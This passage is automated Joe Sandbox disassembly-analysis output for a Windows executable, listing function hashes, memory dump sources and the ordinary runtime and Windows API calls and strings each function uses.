                                                                          • Instruction ID: 5ebe9ff74a698e88cd56b767a00e1c1d02b415728bd19988d50d62528bf8ea50
                                                                          • Opcode Fuzzy Hash: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                          • Instruction Fuzzy Hash: 5211B622B0E68195FB10FB10E5512F9A360FF89B84FC55131D68D47669EF2CD607CB20
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcess
                                                                          • String ID:
                                                                          • API String ID: 3712363035-3916222277
                                                                          • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                          • Instruction ID: 22961d414efe6c51b63af2315e14194496fd48b8ded3331f76672603f2ca5d9d
                                                                          • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                          • Instruction Fuzzy Hash: 0E115172A1D7419EE714AF12F81019AF6A5FB88780FC55136EA4947A74DF3CD092CB14
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 3678867486-1403004172
                                                                          • Opcode ID: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                          • Instruction ID: 38c6d5088339c0382776d630410c6f51a67c9cca69c6644a912f52d3888b87f9
                                                                          • Opcode Fuzzy Hash: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                          • Instruction Fuzzy Hash: 6E01C821A1E58296EA20F720E5502F9D320FF85784FC25131E58D47AAAFE2CD20ACB11
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                          • String ID: !$tan
                                                                          • API String ID: 3384550415-2428968949
                                                                          • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                          • Instruction ID: c97b10ab6613f36b089d2e7931f5f020d180b6c79a10aedefdc91edd7ae78b26
                                                                          • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                          • Instruction Fuzzy Hash: 1401D671E2DB8545DA14DF12A40437AA192FBDA7D4F904334EA9E0BB94FF7CD0418B00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Message
                                                                          • String ID: AutoIt$Error allocating memory.
                                                                          • API String ID: 2030045667-4017498283
                                                                          • Opcode ID: f1d0e9594dbd70012e5d94681f3f0c05ed3699d04d903328bffb77d45b4c69ef
                                                                          • Instruction ID: d22301dde8dc159006fe54e98ac2551be6bbb2f1066a88629df32f5f74aef04b
                                                                          • Opcode Fuzzy Hash: f1d0e9594dbd70012e5d94681f3f0c05ed3699d04d903328bffb77d45b4c69ef
                                                                          • Instruction Fuzzy Hash: D5F0E520B1E2864AEB18B795F6513B9A261DF4C780FD55431D94D0BBBAFDBDE4838320
                                                                          APIs
                                                                          • try_get_function.LIBVCRUNTIME ref: 00007FF7ADC275E9
                                                                          • TlsSetValue.KERNEL32(?,?,?,00007FF7ADC27241,?,?,?,?,00007FF7ADC2660C,?,?,?,?,00007FF7ADC24CD3), ref: 00007FF7ADC27600
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Valuetry_get_function
                                                                          • String ID: FlsSetValue
                                                                          • API String ID: 738293619-3750699315
                                                                          • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                          • Instruction ID: 17f7776d7d7f20f483b5ebe5c96c1f781d88a13800bd03da4cb64c8b8550f571
                                                                          • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                          • Instruction Fuzzy Hash: 4BE0E5A1A0E58285EB057B44E4400B5A361EF48B81FCA4031D90D072B0FE3CE946C620
                                                                          APIs
                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7ADC25629
                                                                          • _CxxThrowException.LIBVCRUNTIME ref: 00007FF7ADC2563A
                                                                            • Part of subcall function 00007FF7ADC27018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC2563F), ref: 00007FF7ADC2708D
                                                                            • Part of subcall function 00007FF7ADC27018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC2563F), ref: 00007FF7ADC270BF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                          • String ID: Unknown exception
                                                                          • API String ID: 3561508498-410509341
                                                                          • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                          • Instruction ID: 39e94c0ae2f5cb85d82f731cc9f1f42565513d7851aafc72b0e013b3a564f14f
                                                                          • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                          • Instruction Fuzzy Hash: 35D01762A2E98699DE20FB04D8813A9E330FB84308FD14431E24D425B5FF2CD64BD720